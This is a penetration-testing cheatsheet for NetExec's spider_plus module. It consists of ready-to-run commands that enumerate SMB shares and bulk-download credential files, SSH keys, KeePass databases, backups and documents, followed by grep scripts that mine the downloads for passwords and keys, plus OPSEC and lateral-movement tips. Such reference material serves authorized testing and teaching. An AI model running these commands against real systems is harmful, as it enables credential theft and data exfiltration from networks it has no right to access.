daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

netexec-spiderplus.md (15644B)


      1 ---
      2 title: "NetExec - SpiderPlus"
      3 description: "NetExec has two main spider modules:"
      4 category: tools
      5 tags: ["tools"]
      6 tools: ["NetExec", "PowerShell"]
      7 difficulty: intermediate
      8 updated: "2026-08-10"
      9 source: "vault:Tools/NetExec - SpiderPlus.md"
     10 ---
     11 # NetExec Spider Module Guide - Downloading Files from SMB Shares
     12 
     13 ## Spider Modules Overview
     14 
     15 NetExec has two main spider modules:
     16 - **spider_plus** - Modern, feature-rich (recommended)
     17 - **spider** - Legacy module (deprecated)
     18 
     19 ---
     20 
     21 ## Spider Plus Module Deep Dive
     22 
     23 ### 1. Basic Spider Usage (List Files Only)
     24 
     25 ```bash
     26 # Spider all shares (read-only mode - no downloads)
     27 nxc smb 10.10.11.51 -u 'username' -p 'password' -M spider_plus
     28 
     29 # Spider with null/guest session
     30 nxc smb 10.10.11.51 -u '' -p '' -M spider_plus
     31 nxc smb 10.10.11.51 -u 'guest' -p '' -M spider_plus
     32 
     33 # Spider specific share
     34 nxc smb 10.10.11.51 -u 'username' -p 'password' -M spider_plus -o SHARE=ShareName
     35 ```
     36 
     37 **Output Location:** Results saved to `/tmp/nxc_spider_plus/<IP>_<timestamp>.json`
     38 
     39 ---
     40 
     41 ## 2. Downloading Files
     42 
     43 ### Download All Files
     44 ```bash
     45 # Enable download mode (downloads everything!)
     46 nxc smb 10.10.11.51 -u 'username' -p 'password' -M spider_plus -o READ_ONLY=false
     47 
     48 # Downloads saved to: /tmp/nxc_spider_plus/<IP>/
     49 ```
     50 
     51 ⚠️ **Warning:** This downloads ALL accessible files. Use filters to limit!
     52 
     53 ---
     54 
     55 ## 3. Filtering Options
     56 
     57 ### Filter by File Extension
     58 
     59 ```bash
     60 # Download only specific file types
     61 nxc smb 10.10.11.51 -u 'username' -p 'password' -M spider_plus -o READ_ONLY=false EXT=txt,doc,docx,pdf
     62 
     63 # Common useful extensions
     64 nxc smb 10.10.11.51 -u 'username' -p 'password' -M spider_plus -o READ_ONLY=false EXT=txt,pdf,docx,xlsx,xml,config,conf,ini,ps1,bat,cmd
     65 
     66 # Password files and sensitive data
     67 nxc smb 10.10.11.51 -u 'username' -p 'password' -M spider_plus -o READ_ONLY=false EXT=txt,xml,config,ini,kdbx,key,pem
     68 
     69 # Scripts and code
     70 nxc smb 10.10.11.51 -u 'username' -p 'password' -M spider_plus -o READ_ONLY=false EXT=ps1,bat,cmd,vbs,js,py,sh
     71 ```
     72 
     73 ### Filter by File Size
     74 
     75 ```bash
     76 # Download files within size range (in bytes)
     77 nxc smb 10.10.11.51 -u 'username' -p 'password' -M spider_plus -o READ_ONLY=false MAX_FILE_SIZE=52428800
     78 
     79 # Small files only (under 10MB)
     80 nxc smb 10.10.11.51 -u 'username' -p 'password' -M spider_plus -o READ_ONLY=false MAX_FILE_SIZE=10485760
     81 
     82 # Exclude empty files
     83 nxc smb 10.10.11.51 -u 'username' -p 'password' -M spider_plus -o READ_ONLY=false MIN_FILE_SIZE=1
     84 ```
     85 
     86 **Size Reference:**
     87 - 1 MB = 1,048,576 bytes
     88 - 10 MB = 10,485,760 bytes
     89 - 50 MB = 52,428,800 bytes
     90 - 100 MB = 104,857,600 bytes
     91 
     92 ### Filter by Pattern (Filename Matching)
     93 
     94 ```bash
     95 # Download files matching a pattern
     96 nxc smb 10.10.11.51 -u 'username' -p 'password' -M spider_plus -o READ_ONLY=false PATTERN=password
     97 
     98 # Multiple patterns (comma-separated)
     99 nxc smb 10.10.11.51 -u 'username' -p 'password' -M spider_plus -o READ_ONLY=false PATTERN=password,admin,secret,credential,backup
    100 
    101 # Case-insensitive pattern matching (default behavior)
    102 nxc smb 10.10.11.51 -u 'username' -p 'password' -M spider_plus -o READ_ONLY=false PATTERN=pass
    103 ```
    104 
    105 ### Exclude Folders
    106 
    107 ```bash
    108 # Exclude specific directories
    109 nxc smb 10.10.11.51 -u 'username' -p 'password' -M spider_plus -o READ_ONLY=false EXCLUDE_DIR=Windows,Program Files
    110 
    111 # Exclude common system folders
    112 nxc smb 10.10.11.51 -u 'username' -p 'password' -M spider_plus -o EXCLUDE_DIR="Windows,Program Files,Program Files (x86),$Recycle.Bin"
    113 ```
    114 
    115 ---
    116 
    117 ## 4. Advanced Filtering Combinations
    118 
    119 ### Hunt for Passwords and Credentials
    120 
    121 ```bash
    122 # Download credential-related files
    123 nxc smb 10.10.11.51 -u 'username' -p 'password' -M spider_plus \
    124   -o READ_ONLY=false \
    125      PATTERN=password,pass,pwd,credential,cred,secret,admin,backup,config \
    126      EXT=txt,xml,config,ini,conf,kdbx,key,pem,ppk \
    127      MAX_FILE_SIZE=10485760
    128 
    129 # Download KeePass databases
    130 nxc smb 10.10.11.51 -u 'username' -p 'password' -M spider_plus \
    131   -o READ_ONLY=false \
    132      EXT=kdbx,kdb
    133 
    134 # Download SSH keys
    135 nxc smb 10.10.11.51 -u 'username' -p 'password' -M spider_plus \
    136   -o READ_ONLY=false \
    137      PATTERN=id_rsa,id_dsa,id_ecdsa,id_ed25519 \
    138      EXT=pem,key,ppk
    139 ```
    140 
    141 ### Hunt for Scripts and Configuration
    142 
    143 ```bash
    144 # Download scripts and configs
    145 nxc smb 10.10.11.51 -u 'username' -p 'password' -M spider_plus \
    146   -o READ_ONLY=false \
    147      EXT=ps1,bat,cmd,vbs,sh,py,config,conf,ini,xml,json \
    148      MAX_FILE_SIZE=5242880
    149 
    150 # PowerShell scripts only
    151 nxc smb 10.10.11.51 -u 'username' -p 'password' -M spider_plus \
    152   -o READ_ONLY=false \
    153      EXT=ps1,psm1,psd1
    154 ```
    155 
    156 ### Hunt for Documentation
    157 
    158 ```bash
    159 # Download documents
    160 nxc smb 10.10.11.51 -u 'username' -p 'password' -M spider_plus \
    161   -o READ_ONLY=false \
    162      EXT=doc,docx,pdf,txt,rtf,odt,xls,xlsx \
    163      MAX_FILE_SIZE=52428800
    164 
    165 # Small text files only (README, notes, etc.)
    166 nxc smb 10.10.11.51 -u 'username' -p 'password' -M spider_plus \
    167   -o READ_ONLY=false \
    168      EXT=txt,md \
    169      MAX_FILE_SIZE=1048576
    170 ```
    171 
    172 ### Hunt for Backup Files
    173 
    174 ```bash
    175 # Download backup files
    176 nxc smb 10.10.11.51 -u 'username' -p 'password' -M spider_plus \
    177   -o READ_ONLY=false \
    178      PATTERN=backup,bak,old,copy \
    179      EXT=bak,zip,7z,rar,tar,gz,old
    180 
    181 # Archive files
    182 nxc smb 10.10.11.51 -u 'username' -p 'password' -M spider_plus \
    183   -o READ_ONLY=false \
    184      EXT=zip,7z,rar,tar,gz,bz2 \
    185      MAX_FILE_SIZE=104857600
    186 ```
    187 
    188 ---
    189 
    190 ## 5. Complete Spider Workflow
    191 
    192 ### Phase 1: Reconnaissance (No Download)
    193 
    194 ```bash
    195 # Step 1: Identify accessible shares
    196 nxc smb 10.10.11.51 -u 'username' -p 'password' --shares
    197 
    198 # Step 2: Spider to see what's available (read-only)
    199 nxc smb 10.10.11.51 -u 'username' -p 'password' -M spider_plus
    200 
    201 # Step 3: Review the JSON output
    202 cat /tmp/nxc_spider_plus/10.10.11.51_*.json | jq '.'
    203 
    204 # Step 4: Analyze file types and names
    205 cat /tmp/nxc_spider_plus/10.10.11.51_*.json | jq '.[] | .name' | sort -u
    206 ```
    207 
    208 ### Phase 2: Targeted Download
    209 
    210 ```bash
    211 # Based on reconnaissance, download specific files
    212 
    213 # Example: Found interesting configs
    214 nxc smb 10.10.11.51 -u 'username' -p 'password' -M spider_plus \
    215   -o READ_ONLY=false \
    216      SHARE=IT_Share \
    217      EXT=config,conf,xml,ini \
    218      MAX_FILE_SIZE=5242880
    219 
    220 # Example: Found password files
    221 nxc smb 10.10.11.51 -u 'username' -p 'password' -M spider_plus \
    222   -o READ_ONLY=false \
    223      PATTERN=password,credential \
    224      MAX_FILE_SIZE=1048576
    225 ```
    226 
    227 ### Phase 3: Post-Download Analysis
    228 
    229 ```bash
    230 # Navigate to download location
    231 cd /tmp/nxc_spider_plus/10.10.11.51/
    232 
    233 # Find all downloaded files
    234 find . -type f
    235 
    236 # Search for passwords in files
    237 grep -r -i "password" .
    238 grep -r -i "pass" . | grep -v "Binary"
    239 
    240 # Search for usernames
    241 grep -r -i "username" .
    242 grep -r -i "admin" .
    243 
    244 # Search for IP addresses
    245 grep -r -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" .
    246 
    247 # Search for email addresses
    248 grep -r -oE "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Z|a-z]{2,}\b" .
    249 
    250 # List files by size
    251 find . -type f -exec ls -lh {} \; | sort -k5 -h
    252 
    253 # Find recently modified files
    254 find . -type f -mtime -30 -ls
    255 ```
    256 
    257 ---
    258 
    259 ## 6. Spider Plus All Options Reference
    260 
    261 ```bash
    262 nxc smb <target> -u <user> -p <pass> -M spider_plus -o <OPTIONS>
    263 ```
    264 
    265 | Option | Description | Example |
    266 |:---|:---|:---|
    267 | `READ_ONLY` | If false, downloads files (default: true) | `READ_ONLY=false` |
    268 | `SHARE` | Target specific share | `SHARE=C$` |
    269 | `EXCLUDE_DIR` | Exclude directories (comma-separated) | `EXCLUDE_DIR=Windows,Temp` |
    270 | `MAX_FILE_SIZE` | Max file size in bytes (default: 51200) | `MAX_FILE_SIZE=52428800` |
    271 | `MIN_FILE_SIZE` | Min file size in bytes | `MIN_FILE_SIZE=1` |
    272 | `EXT` | File extensions (comma-separated) | `EXT=txt,pdf,docx` |
    273 | `PATTERN` | Filename pattern match | `PATTERN=password,admin` |
    274 | `EXCLUDE_EXTS` | Exclude extensions | `EXCLUDE_EXTS=exe,dll,sys` |
    275 
    276 ---
    277 
    278 ## 7. Practical Examples
    279 
    280 ### Example 1: Initial Quick Recon
    281 
    282 ```bash
    283 # First pass - just enumerate
    284 nxc smb 10.10.11.51 -u 'jsmith' -p 'Summer2024!' -M spider_plus
    285 
    286 # Check results
    287 cat /tmp/nxc_spider_plus/10.10.11.51_*.json | jq '.[].name' | grep -i password
    288 ```
    289 
    290 ### Example 2: Download Interesting Files
    291 
    292 ```bash
    293 # Download files with "password" or "config" in name
    294 nxc smb 10.10.11.51 -u 'jsmith' -p 'Summer2024!' -M spider_plus \
    295   -o READ_ONLY=false \
    296      PATTERN=password,config,credential,backup \
    297      EXT=txt,xml,ini,config,conf \
    298      MAX_FILE_SIZE=10485760
    299 
    300 # Check what was downloaded
    301 ls -lah /tmp/nxc_spider_plus/10.10.11.51/
    302 ```
    303 
    304 ### Example 3: Specific Share Hunting
    305 
    306 ```bash
    307 # Target the SYSVOL share (often contains scripts)
    308 nxc smb 10.10.11.51 -u 'jsmith' -p 'Summer2024!' -M spider_plus \
    309   -o READ_ONLY=false \
    310      SHARE=SYSVOL \
    311      EXT=bat,cmd,ps1,vbs,xml
    312 
    313 # Target NETLOGON share
    314 nxc smb 10.10.11.51 -u 'jsmith' -p 'Summer2024!' -M spider_plus \
    315   -o READ_ONLY=false \
    316      SHARE=NETLOGON \
    317      EXT=bat,cmd,ps1,vbs
    318 ```
    319 
    320 ### Example 4: Large Scale Data Exfiltration
    321 
    322 ```bash
    323 # Download all office documents (be careful with size!)
    324 nxc smb 10.10.11.51 -u 'jsmith' -p 'Summer2024!' -M spider_plus \
    325   -o READ_ONLY=false \
    326      EXT=doc,docx,xls,xlsx,ppt,pptx,pdf \
    327      MAX_FILE_SIZE=52428800 \
    328      EXCLUDE_DIR="Windows,Program Files"
    329 
    330 # Monitor download progress
    331 watch -n 5 'du -sh /tmp/nxc_spider_plus/10.10.11.51/'
    332 ```
    333 
    334 ### Example 5: Multiple Hosts
    335 
    336 ```bash
    337 # Spider multiple hosts (saves to separate folders)
    338 nxc smb 10.10.11.0/24 -u 'jsmith' -p 'Summer2024!' -M spider_plus \
    339   -o READ_ONLY=false \
    340      PATTERN=password \
    341      EXT=txt,xml,config \
    342      MAX_FILE_SIZE=5242880
    343 
    344 # Results organized by IP
    345 ls -lah /tmp/nxc_spider_plus/
    346 ```
    347 
    348 ---
    349 
    350 ## 8. Pro Tips & Best Practices
    351 
    352 ### Performance Tips
    353 
    354 ```bash
    355 # Use MAX_FILE_SIZE to avoid huge files
    356 nxc smb 10.10.11.51 -u 'user' -p 'pass' -M spider_plus -o READ_ONLY=false MAX_FILE_SIZE=10485760
    357 
    358 # Use EXCLUDE_DIR to skip system folders
    359 nxc smb 10.10.11.51 -u 'user' -p 'pass' -M spider_plus -o EXCLUDE_DIR="Windows,Program Files,$Recycle.Bin"
    360 
    361 # Target specific shares to reduce scope
    362 nxc smb 10.10.11.51 -u 'user' -p 'pass' -M spider_plus -o SHARE=Users
    363 ```
    364 
    365 ### OPSEC Considerations
    366 
    367 ```bash
    368 # Start with read-only enumeration
    369 nxc smb 10.10.11.51 -u 'user' -p 'pass' -M spider_plus
    370 
    371 # Download only specific, small files to reduce network traffic
    372 nxc smb 10.10.11.51 -u 'user' -p 'pass' -M spider_plus \
    373   -o READ_ONLY=false \
    374      PATTERN=password \
    375      EXT=txt \
    376      MAX_FILE_SIZE=1048576
    377 
    378 # Be aware: Downloads create access logs on the target
    379 ```
    380 
    381 ### Organizing Downloads
    382 
    383 ```bash
    384 # Create organized workspace
    385 mkdir -p ~/pentest/target/smb_loot
    386 cd ~/pentest/target/smb_loot
    387 
    388 # Run spider
    389 nxc smb 10.10.11.51 -u 'user' -p 'pass' -M spider_plus -o READ_ONLY=false
    390 
    391 # Move from /tmp to your workspace
    392 mv /tmp/nxc_spider_plus/10.10.11.51 ./
    393 
    394 # Organize by file type
    395 cd 10.10.11.51
    396 mkdir configs scripts documents
    397 find . -name "*.config" -o -name "*.xml" -o -name "*.ini" | xargs -I {} mv {} configs/
    398 find . -name "*.ps1" -o -name "*.bat" -o -name "*.cmd" | xargs -I {} mv {} scripts/
    399 find . -name "*.doc*" -o -name "*.pdf" -o -name "*.txt" | xargs -I {} mv {} documents/
    400 ```
    401 
    402 ---
    403 
    404 ## 9. Post-Spider Analysis Scripts
    405 
    406 ### Quick Grep for Sensitive Data
    407 
    408 ```bash
    409 #!/bin/bash
    410 # save as analyze_spider.sh
    411 
    412 TARGET_DIR="/tmp/nxc_spider_plus/10.10.11.51"
    413 
    414 echo "[+] Searching for passwords..."
    415 grep -r -i "password\s*=" $TARGET_DIR 2>/dev/null | grep -v "Binary"
    416 
    417 echo "[+] Searching for usernames..."
    418 grep -r -i "username\s*=" $TARGET_DIR 2>/dev/null | grep -v "Binary"
    419 
    420 echo "[+] Searching for API keys..."
    421 grep -r -i "api_key\|apikey\|api-key" $TARGET_DIR 2>/dev/null | grep -v "Binary"
    422 
    423 echo "[+] Searching for connection strings..."
    424 grep -r -i "connection.*string\|server=\|database=" $TARGET_DIR 2>/dev/null | grep -v "Binary"
    425 
    426 echo "[+] Searching for private keys..."
    427 find $TARGET_DIR -type f -exec grep -l "BEGIN.*PRIVATE KEY" {} \;
    428 
    429 echo "[+] Files containing 'password':"
    430 find $TARGET_DIR -type f -exec grep -l -i "password" {} \; | head -20
    431 ```
    432 
    433 ### Generate File Inventory
    434 
    435 ```bash
    436 #!/bin/bash
    437 # save as inventory.sh
    438 
    439 TARGET_DIR="/tmp/nxc_spider_plus/10.10.11.51"
    440 
    441 echo "[+] File type distribution:"
    442 find $TARGET_DIR -type f | sed 's/.*\.//' | sort | uniq -c | sort -rn
    443 
    444 echo -e "\n[+] Largest files:"
    445 find $TARGET_DIR -type f -exec ls -lh {} \; | sort -k5 -hr | head -10
    446 
    447 echo -e "\n[+] Recently modified files:"
    448 find $TARGET_DIR -type f -mtime -30 -exec ls -lh {} \; | head -10
    449 
    450 echo -e "\n[+] Files with interesting names:"
    451 find $TARGET_DIR -type f | grep -iE "(password|config|admin|secret|credential|backup|key)"
    452 ```
    453 
    454 ---
    455 
    456 ## 10. Common Issues & Solutions
    457 
    458 ### Issue: Permission Denied
    459 ```bash
    460 # Some files may not be readable
    461 # Solution: Spider will skip them and continue
    462 
    463 # Check spider_plus JSON for access denied files
    464 cat /tmp/nxc_spider_plus/10.10.11.51_*.json | jq '.[] | select(.error != null)'
    465 ```
    466 
    467 ### Issue: Too Many Files
    468 ```bash
    469 # If spider returns thousands of files:
    470 # Solution: Use more specific filters
    471 
    472 # Count files before downloading
    473 cat /tmp/nxc_spider_plus/10.10.11.51_*.json | jq '. | length'
    474 
    475 # Filter more aggressively
    476 nxc smb 10.10.11.51 -u 'user' -p 'pass' -M spider_plus \
    477   -o READ_ONLY=false \
    478      EXT=txt,xml \
    479      PATTERN=password \
    480      MAX_FILE_SIZE=1048576
    481 ```
    482 
    483 ### Issue: Finding Downloaded Files
    484 ```bash
    485 # Default location:
    486 /tmp/nxc_spider_plus/<TARGET_IP>/
    487 
    488 # Spider metadata (JSON):
    489 /tmp/nxc_spider_plus/<TARGET_IP>_<timestamp>.json
    490 
    491 # Find all spider directories
    492 find /tmp/nxc_spider_plus/ -type d
    493 ```
    494 
    495 ---
    496 
    497 ## Quick Reference Card
    498 
    499 | Task | Command |
    500 |:---|:---|
    501 | List files only | `nxc smb <ip> -u <user> -p <pass> -M spider_plus` |
    502 | Download all files | `nxc smb <ip> -u <user> -p <pass> -M spider_plus -o READ_ONLY=false` |
    503 | Download specific types | `nxc smb <ip> -u <user> -p <pass> -M spider_plus -o READ_ONLY=false EXT=txt,pdf` |
    504 | Download by pattern | `nxc smb <ip> -u <user> -p <pass> -M spider_plus -o READ_ONLY=false PATTERN=password` |
    505 | Limit file size | `nxc smb <ip> -u <user> -p <pass> -M spider_plus -o READ_ONLY=false MAX_FILE_SIZE=10485760` |
    506 | Specific share | `nxc smb <ip> -u <user> -p <pass> -M spider_plus -o SHARE=Users` |
    507 | Exclude folders | `nxc smb <ip> -u <user> -p <pass> -M spider_plus -o EXCLUDE_DIR=Windows,Temp` |
    508 | View JSON output | `cat /tmp/nxc_spider_plus/<ip>_*.json \| jq '.'` |
    509 | Find passwords in files | `grep -r -i "password" /tmp/nxc_spider_plus/<ip>/` |
    510 
    511 ---
    512 
    513 ## Real-World Hunting Scenarios
    514 
    515 ### Scenario 1: Found Valid Low-Priv Credentials
    516 
    517 ```bash
    518 # Step 1: What can we access?
    519 nxc smb 10.10.11.51 -u 'jsmith' -p 'pass' --shares
    520 
    521 # Step 2: List everything (no download yet)
    522 nxc smb 10.10.11.51 -u 'jsmith' -p 'pass' -M spider_plus
    523 
    524 # Step 3: Hunt for creds in configs
    525 nxc smb 10.10.11.51 -u 'jsmith' -p 'pass' -M spider_plus \
    526   -o READ_ONLY=false \
    527      PATTERN=password,credential,config \
    528      EXT=xml,config,ini,txt \
    529      MAX_FILE_SIZE=2097152
    530 
    531 # Step 4: Analyze
    532 cd /tmp/nxc_spider_plus/10.10.11.51
    533 grep -r -i "password\|credential" .
    534 ```
    535 
    536 ### Scenario 2: Lateral Movement via Shares
    537 
    538 ```bash
    539 # Download scripts to find hardcoded creds
    540 nxc smb 10.10.11.0/24 -u 'jsmith' -p 'pass' -M spider_plus \
    541   -o READ_ONLY=false \
    542      EXT=ps1,bat,cmd,vbs \
    543      SHARE=SYSVOL
    544 
    545 # Search scripts for credentials
    546 find /tmp/nxc_spider_plus/ -name "*.ps1" -exec grep -H "password\|credential" {} \;
    547 ```
    548 
    549 ### Scenario 3: Backup File Discovery
    550 
    551 ```bash
    552 # Find and download backups
    553 nxc smb 10.10.11.51 -u 'backupuser' -p 'pass' -M spider_plus \
    554   -o READ_ONLY=false \
    555      PATTERN=backup,bak \
    556      EXT=zip,7z,bak,old,backup \
    557      MAX_FILE_SIZE=104857600
    558 
    559 # Extract archives
    560 cd /tmp/nxc_spider_plus/10.10.11.51
    561 find . -name "*.zip" -exec unzip -d extracted {} \;
    562 ```
    563 
    564 ---
    565 
    566 Remember: **Always have proper authorization before downloading files from systems you don't own!**